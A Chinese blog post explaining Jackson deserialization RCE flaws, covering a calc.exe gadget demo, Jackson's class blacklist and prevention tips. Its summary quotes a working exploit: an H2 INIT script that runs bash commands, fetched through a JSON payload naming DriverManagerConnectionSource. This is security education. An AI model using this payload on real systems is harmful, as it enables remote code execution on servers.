【Java Web 安全】jackson漏洞探究、利用、预防

最新推荐文章于 2024-06-23 09:46:24 发布
最新推荐文章于 2024-06-23 09:46:24 发布
阅读量4.8k 收藏 2
点赞数 3
分类专栏: 安全 文章标签: jackson CVE 漏洞 利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qqchaozai/article/details/99624359
版权

前言

阿里云安全公告:2019年7月31日,阿里云应急响应中心监测到有安全研究人员披露Jackson最新反序列化远程代码执行漏洞(CVE-2019-14361和CVE-2019-14439)。同事说怎么jackson这类的json序列化库经常报漏洞,而且基本都是高危漏洞,这些漏洞到底怎么来的,jackson的开发程序员就这么不靠谱么?改不完的BUG?这篇文章就让我们走进jackson的世界,感受它的无奈

1 一个样例

public class JacksonTest {
    public static void main(String[] args) {
	TestObject test = new TestObject();
	test.setName("test");
	test.setObja(new UnSafeObj("calc.exe"));
	test.setObjb(new UnSafeObj("calc.exe"));
	test.setUnSafeObj(new UnSafeObj("calc.exe"));
	String json = bean2Json(test);
	System.out.println(json);
	System.out.println(json2Bean(json, test));
    }
    /**
     * 对象转json
     * @param bean
     * @return
     */
    public static String bean2Json(Object bean) {
	String json = null;
	ObjectMapper mapper = new ObjectMapper();
	try {
//	    mapper.enableDefaultTyping();//将保留对象的实际类型
	    StringWriter sw = new StringWriter();
	    JsonGenerator gen = new JsonFactory().createJsonGenerator(sw);
	    mapper.writeValue(gen, bean);
	    gen.close();
	    json = sw.toString();
	} catch (Exception e) {
	    e.printStackTrace();
	}
	return json;
    }
    /**
     * json转对象
     * 
     * @param json
     * @param obj
     * @return
     */
    public static Object json2Bean(String json, Object obj) {
	ObjectMapper mapper = new ObjectMapper();
	Object bean = null;
	try {
//	    mapper.enableDefaultTyping();//将还原对象的实际类型
	    bean = mapper.readValue(json, obj.getClass());
	} catch (Exception e) {
	    e.printStackTrace();
	}
	return bean;
    }
}
/**
 * 测试对象
 * 
 * @author chaozai
 * @date 2019年8月14日
 *
 */
class TestObject {
    private String name;
    private Object obja;
    @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    private Object objb;
    private UnSafeObj unSafeObj;
    
    TestObject() {
    }
    public String getName() {
	return name;
    }
    public void setName(String name) {
	this.name = name;
    }
    public Object getObja() {
        return obja;
    }
    public void setObja(Object obja) {
        this.obja = obja;
    }
    public Object getObjb() {
        return objb;
    }
    public void setObjb(Object objb) {
        this.objb = objb;
    }
    public UnSafeObj getUnSafeObj() {
        return unSafeObj;
    }
    public void setUnSafeObj(UnSafeObj unSafeObj) {
        this.unSafeObj = unSafeObj;
    }
    @Override
    public String toString() {
        return String.format("TestObject.name=%s, TestObject.obja=%s,TestObject.objb=%s, TestObject.unSafeObj=%s", name, obja,objb,unSafeObj);
    }
}
/**
 * 可被利用,非安全对象
 * 
 * @author chaozai
 * @date 2019年8月14日
 *
 */
class UnSafeObj {
    private String cmd;

    UnSafeObj() {
	System.out.println("UnSafeObj init success");
    }
    UnSafeObj(String cmd) {
	this.cmd = cmd;
    }
    public String getCmd(){
	return cmd;
    }
    public void setCmd(String cmd)  {
	this.cmd = cmd;
	System.out.println(String.format("UnSafeObj execute cmd: %s", cmd));
	try {
	    Runtime.getRuntime().exec(cmd);
	} catch (IOException e) {
	    e.printStackTrace();
	}
    }
}

结果:

  • objb对象json结果包含:"@class":"safe.jackson.UnSafeObj",实际对象的Class全限定名,而obja则是一个普通的map数据对象,两者的区别在于,objb添加了注解:@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
  • json反序列化结束后,obja是map数据对象,而objb则是UnSafeObj真实对象
  • 程序运行结束,会发现运行了两个calc.exe(计算器)程序,可以判断obja并没有走UnSafeObj对象的反序列化
  • 序列化与反序列化添加mapper.enableDefaultTyping(),也能够实现注解同样效果,保留真实序列化对象
{"name":"test","obja":{"cmd":"calc.exe"},"objb":{"@class":"safe.jackson.UnSafeObj","cmd":"calc.exe"},"unSafeObj":{"cmd":"calc.exe"}}
UnSafeObj init success
UnSafeObj execute cmd: calc.exe
UnSafeObj init success
UnSafeObj execute cmd: calc.exe
TestObject.name=test, TestObject.obja={cmd=calc.exe},TestObject.objb=safe.jackson.UnSafeObj@c53dce, TestObject.unSafeObj=safe.jackson.UnSafeObj@15cda3f

2 漏洞起因

其实就是Json反序列化的数据中包含了可被利用的非安全对象。利用场景如上述例子,分为两种:

  • 反序列化对象中包含Object等常见超级父类对象,即可以被其他广泛对象继承(多态特性利用),且对象属性被注解@JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)标识,或者反序列化时执行了mapper.enableDefaultTyping代码。

分析:这两种情况中,json数据里包含属性对象Class名称,那么就可以被攻击者篡改为指定的威胁对象,从而控制了反序列化过程,当然正常情况下,大家代码不使用该反序列化特性即可。那么当对象类型无法正确定位的时候,jackson是如何做反序列化的呢?一步步Debug发现:UntypedObjectDeserializer中会将数据作为LinkedHashMap对象返回

protected Object mapObject(JsonParser jp, DeserializationContext ctxt) throws IOException, JsonProcessingException {
	JsonToken t = jp.getCurrentToken();
	if (t == JsonToken.START_OBJECT) {
	    t = jp.nextToken();
	}

	if (t != JsonToken.FIELD_NAME) {
	    return new LinkedHashMap(4);
	}
	String field1 = jp.getText();
	jp.nextToken();
	Object value1 = deserialize(jp, ctxt);
	if (jp.nextToken() != JsonToken.FIELD_NAME) {
	    LinkedHashMap result = new LinkedHashMap(4);
	    result.put(field1, value1);
	    return result;
	}
	String field2 = jp.getText();
	jp.nextToken();
	Object value2 = deserialize(jp, ctxt);
	if (jp.nextToken() != JsonToken.FIELD_NAME) {
	    LinkedHashMap result = new LinkedHashMap(4);
	    result.put(field1, value1);
	    result.put(field2, value2);
	    return result;
	}

	LinkedHashMap result = new LinkedHashMap();
	result.put(field1, value1);
	result.put(field2, value2);
	do {
	    String fieldName = jp.getText();
	    jp.nextToken();
	    result.put(fieldName, deserialize(jp, ctxt));
	} while (jp.nextToken() != JsonToken.END_OBJECT);
	return result;
}
  • 已有第三方库或自定义对象存在可被利用特性,这才是大量CVE漏洞的根源。

分析:上述例子里的Unsafe对象,以及jackson2.8.11开始,新增黑名单效验类SubTypeValidator中过滤的所有Class对象,大多都是些违反了单一责任原则的对象,在set属性过程中添加了可能超出控制的威胁代码或者是一些敏感对象数据如ConnectionUrl的指定等。

public class SubTypeValidator
{
    protected final static String PREFIX_SPRING = "org.springframework.";

    protected final static String PREFIX_C3P0 = "com.mchange.v2.c3p0.";

    /**
     * Set of well-known "nasty classes", deserialization of which is considered dangerous
     * and should (and is) prevented by default.
     */
    protected final static Set<String> DEFAULT_NO_DESER_CLASS_NAMES;
    static {
        Set<String> s = new HashSet<String>();
        // Courtesy of [https://github.com/kantega/notsoserial]:
        // (and wrt [databind#1599])
	.......省略部分代码

        // [databind#2389]: logback/jndi
        s.add("ch.qos.logback.core.db.JNDIConnectionSource");

        // [databind#2410]: HikariCP/metricRegistry config
        s.add("com.zaxxer.hikari.HikariConfig");

        // [databind#2420]: CXF/JAX-RS provider/XSLT
        s.add("org.apache.cxf.jaxrs.provider.XSLTJaxbProvider");
        
        DEFAULT_NO_DESER_CLASS_NAMES = Collections.unmodifiableSet(s);
    }

    ......省略部分代码

    public void validateSubType(DeserializationContext ctxt, JavaType type,
            BeanDescription beanDesc) throws JsonMappingException
    {
        // There are certain nasty classes that could cause problems, mostly
        // via default typing -- catch them here.
        final Class<?> raw = type.getRawClass();
        String full = raw.getName();

        main_check:
        do {
            if (_cfgIllegalClassNames.contains(full)) {
                break;
            }

            // 18-Dec-2017, tatu: As per [databind#1855], need bit more sophisticated handling
            //    for some Spring framework types
            // 05-Jan-2017, tatu: ... also, only applies to classes, not interfaces
            if (raw.isInterface()) {
                ;
            } else if (full.startsWith(PREFIX_SPRING)) {
                for (Class<?> cls = raw; (cls != null) && (cls != Object.class); cls = cls.getSuperclass()){
                    String name = cls.getSimpleName();
                    // looking for "AbstractBeanFactoryPointcutAdvisor" but no point to allow any is there?
                    if ("AbstractPointcutAdvisor".equals(name)
                            // ditto  for "FileSystemXmlApplicationContext": block all ApplicationContexts
                            || "AbstractApplicationContext".equals(name)) {
                        break main_check;
                    }
                }
            } else if (full.startsWith(PREFIX_C3P0)) {
                // [databind#1737]; more 3rd party
                // s.add("com.mchange.v2.c3p0.JndiRefForwardingDataSource");
                // s.add("com.mchange.v2.c3p0.WrapperConnectionPoolDataSource");
                // [databind#1931]; more 3rd party
                // com.mchange.v2.c3p0.ComboPooledDataSource
                // com.mchange.v2.c3p0.debug.AfterCloseLoggingComboPooledDataSource 
                if (full.endsWith("DataSource")) {
                    break main_check;
                }
            }
            return;
        } while (false);

        ctxt.reportBadTypeDefinition(beanDesc,
                "Illegal type (%s) to deserialize: prevented for security reasons", full);
    }
}

一共过滤了:零散的各种第三方库;Spring框架中AbstractPointcutAdvisor和AbstractApplicationContext的子类;c3p0里各种DataSource类;所有接口类。

3 漏洞预防

通常安全厂商发布类似公告的时候,该漏洞可能已经被攻击者利用,那么我们怎么可以第一时间知道可能由jackson照成影响的漏洞呢?一共两种:

发现:CVE一共收录了26个相关漏洞

发现:居然还有CVE暂时没有收录的漏洞,那到底是哪个关联库呢?去SubTypeValidator里找#2420得知:

// [databind#2420]: CXF/JAX-RS provider/XSLT
s.add("org.apache.cxf.jaxrs.provider.XSLTJaxbProvider");

4 总结

利用前提:

  • 有漏洞的jackson版本
  • 可接受未信任的客户端json数据
  • json对象包含Object等jdk常见父类的属性对象+开启了可自定义属性所属Class的序列化特性
  • 包含可被利用的gadget(非安全对象),且在jackson黑名单之外

利用方式:

  • 利用gadget去构建SSRF(Server-Side Request Forgery:服务器端请求伪造)
  • 再转化为RCE(remote command/code execute)

一个利用Connection回调H2去获取信息的样例,来自https://www.anquanke.com/post/id/182695

通过python构建一个HTTP服务器(比如python -m SimpleHttpServer),托管如下inject.sql INIT文件:
CREATE ALIAS SHELLEXEC AS $ $ String shellexec(String cmd) throws java.io.IOException {
    String[] command = {"bash", "-c", cmd};
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
    return s.hasNext() ? s.next() : "";  }
$ $;
CALL SHELLEXEC('id > exploited.txt')
然后通过如下方式运行测试应用:
$ jruby test.rb "["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin)

预防手段:

  • 升级jackson?有时不是你想升就能升,绑定库太多
  • 检查序列化对象是否包含可被利用的非安全对象
  • 禁用指定Class的序列化特性
  • 有空多看看CVE和GitHub更新

 

爱家人,爱生活,爱设计,爱编程,拥抱精彩人生!

qqchaozai
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
java jackson漏洞_【Java进阶】Jackson安全漏洞,可导致服务器文件被恶意窃取
weixin_42322686的博客
02-16 804
上周升级完Fastjson之后,去了解了下Jackson是否也有相关的漏洞。 果不其然,看到了一个issue虽然这个issue是好几个月前的了,但是可能大家对Jackson比较不在意,以为国外的开源要牛逼一点,不会像Fastjson那么多问题,这里要纠正一点,fastjson之所以问题多,那是因为你接触的多,Jackson的问题其实也不少,只是你接触的少。 就拿这种issue的问题来说,这个漏洞...
Jackson 远程命令执行漏洞CVE-2019-12384)
锋刃科技的博客
06-26 8172
前言 由于Jackson黑名单过滤不完整而导致,当开发人员在应用程序中通过ObjectMapper对象调用enableDefaultTyping方法时,程序就会受到此漏洞的影响,攻击者就可利用构造的包含有恶意代码的json数据包对应用进行攻击,直接获取服务器控制权限。 影响版本 Jackson-databind 2.0.0 ~2.9.9.1 环境搭建 创建一个docker-compose.yml的文件 version: '2' services: web: image: te
探索Jackson-RCE-Via-Spel:安全漏洞的警示与防护
最新发布
gitblog_00024的博客
06-23 232
探索Jackson-RCE-Via-Spel:安全漏洞的警示与防护 项目地址:https://gitcode.com/irsl/jackson-rce-via-spel 在深入理解现代Java应用的安全性时,我们必须时刻警惕潜在的风险和威胁。Jackson-databind是一个广泛使用的JSON库,它提供了一种强大的数据绑定机制,但同时也存在一个默认类型的漏洞(CVE-2017-7525),可能...
继Struts2漏洞Jackson漏洞来袭
weixin_33964094的博客
04-20 81
前两天休息,偏偏此时出现漏洞了,心里咯噔一下,发表一下希望关注的博友可以重视下。1、时间:2017-4-172、漏洞: Jackson框架Java反序列化远程代码执行漏洞Jackson可以轻松的将Java对象转换成json对象和xml文档,同样也可以将json、xml转换成Java对象。3、漏洞分析Jackson是一套开源的java序列化与反序列化工具框架,可将java对象序列化为xml和js...
Jackson反序列化代码执行漏洞
I want to know a little more.
06-09 2323
在我们的一次研究过程中,我们分析了一个使用Jackson库对JSON进行反序列化的应用程序。在分析过程中,我们寻找到一个反序列化漏洞,并可以对反序列化的类进行控制。在本文中,我们将向读者展示攻击者如何利用此反序列化漏洞来触发服务器端请求伪造(SSRF)和远程代码执行等攻击。 该研究催生了新的CVE-2019-12384生成,并影响到了一系列RedHat产品: 漏洞攻击条件 正如Jackson在On Jackson CVEs中写到的那样:下面是利用工具需要的要求: (1)应用程序接受由不受信任的客
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-14439)
05-08
Jackson官方github仓库发布安全issue,涉及漏洞CVE-2019-14361和CVE-2019-14439,均是针对CVE-2019-12384漏洞的绕过利用方式,当用户提交一个精心构造的恶意JSON数据到WEB服务器端时,可导致远程任意代码执行。阿里云应急响应中心提醒Jackson用户尽快采取安全措施阻止漏洞攻击。
Jackson CVE-2018-19361 反序列化漏洞
王嘟嘟的博客
03-10 409
涉及版本:
Java Web反序列化网络安全漏洞分析.pdf
03-31
Java Web反序列化漏洞是指在Java Web应用程序中,由于对序列化对象的不当处理,攻击者可以构造恶意的序列化数据,导致程序在反序列化过程中执行非预期的代码,从而引发安全问题。这种漏洞的存在使得攻击者可以绕过...
Java安全相关的漏洞和技术demo
06-18
Java安全相关的漏洞和技术demo,原生Java、Fastjson、Jackson、Hessian2、XML反序列化漏洞利用和Spring、Dubbo、Shiro、CAS、Tomcat、RMI、Nexus等框架\中间件\功能的exploits以及Java Security Manager绕过、Dubbo-...
JAVAJackson反序列化漏洞.docx
07-27
复现该漏洞通常涉及构造特定的JSON输入,利用Jackson反序列化时的弱点,触发恶意行为。在复现过程中,需要设置合适的环境(如JDK 1.8.0_171和Resin 4.0.52),并理解Jackson反序列化流程的细节,以便找到注入恶意...
java反序列化漏洞URLClassLoader利用1
08-08
这里提到的“Java反序列化漏洞URLClassLoader利用1”是利用Java中的`java.net.URLClassLoader`来远程加载并执行恶意代码的一个示例。 `URLClassLoader`是Java中的一个类加载器,它可以从指定的URL列表中加载类。...
Java反序列化漏洞利用工具(joomla)
01-01
Java反序列化漏洞是软件安全领域的一个重要话题,尤其在Java应用程序中,它可能导致严重的安全风险。本工具针对的是Joomla平台,一个广泛使用的开源内容管理系统(CMS)。Joomla的某些版本存在Java反序列化漏洞,...
java jackson漏洞_小白审计JACKSON反序列化漏洞
weixin_29100399的博客
02-16 1590
1. JACKSON漏洞解析poc代码:main.javaimportcom.fasterxml.jackson.databind.ObjectMapper;importcom.sun.org.apache.xerces.internal.impl.dv.util.Base64;importorg.springframework.util.FileCopyUtils;importjava.io.B...
Jackson漏洞问题
m0_47413371的博客
07-15 752
前提:需要升级jackson三个jar 包 替换jackson 三个jar 包报错 ,需要查看Jackson对应的jdk版本 更换jdk版本 替换方法:参考网上的替换方法。 遇到问题: 1、eclipse问题(有些东西可忽略,前提不报错情况下) 2、服务器空间用的很快–不清楚问题所在,(别人帮忙重启一下服务器就好了) 3、服务器跟换jdk的时候 1.压缩什么的用root权限,但是weblogic 权限不够,徐亚对weblogic赋权 2.配置文件并没有改profile文件,改的bin 中的 setDomai
java jackson漏洞_CVE-2019-12384:Jackson反序列化漏洞分析
weixin_35242442的博客
02-16 420
content = ARGV[0]puts "Mapping"mapper = ObjectMapper.newmapper.enableDefaultTypingmapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);puts "Serializing"obj = mapper.readValue(content, j...
java jackson漏洞_CVE-2019-12086 jackson任意文件读取漏洞
weixin_42423349的博客
02-16 836
漏洞说明CVE-2019-12086:在2.9.9之前的FasterXML jackson-databind 2.x中发现了漏洞。在开启Default Typing的情况下,且classpath中存在mysql-connector-java 8.0.15版本(2019.2.1发布)以下,攻击者可以通过发送恶意json数据读取任意文件。环境搭建引入jar包:CVE-2019-12086 POC首先创...
Jackson 反序列化漏洞原理
王嘟嘟的博客
02-28 2967
Jackson 最基础的功能就是将制定的类 序列化 to json,然后json to 序列化的这样一个工具第三方库,正常情况下因为需要执行类进行转换,所以除非是故意留有后门,否则是不会出现问题的。但是为了处理一个情况,就是处理未知的json转换的时候,需要对多种场景进行处理。于是就有了Jackson多态机制。如:需要处理多个子类的情况。那么当json中的指定的类的seter或者无参构造方法中存在可利用点的时候,就会造成有效的反序列化攻击。也就是需要找的反序列化调用链。
再爆安全漏洞,这次轮到Jackson了,竟由阿里云上报
2401_83621784的博客
04-12 1765
外行看热闹,内行看门道。千万不能说Fastjson出了个漏洞Jackson也来一个就得出结论说打平手了,那会稍显外行。正所谓假设可以大胆,但小心求证,下结论需要谨慎。总的来说,此次漏洞影响甚小,不用大惊小怪,我就继续我的Jackson之旅啦。自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
反序列化漏洞_Jackson反序列化漏洞
weixin_39839726的博客
12-14 1033
Author:平安银行应用安全团队@Glassy引言今天又看到有一些安全预警平台爆出的Jackson反序列漏洞,要求把Jackson升级到2.9.10.6,所以在下面对漏洞原理和适用范围做一下分析,并给出poc。补丁分析补丁特别简单,也如同漏洞公告一样,增加了几处黑名单。POC构造br.com.anteros.dbcp.AnterosDBCPDataSource先看一下该jar包的mav...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qqchaozai

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值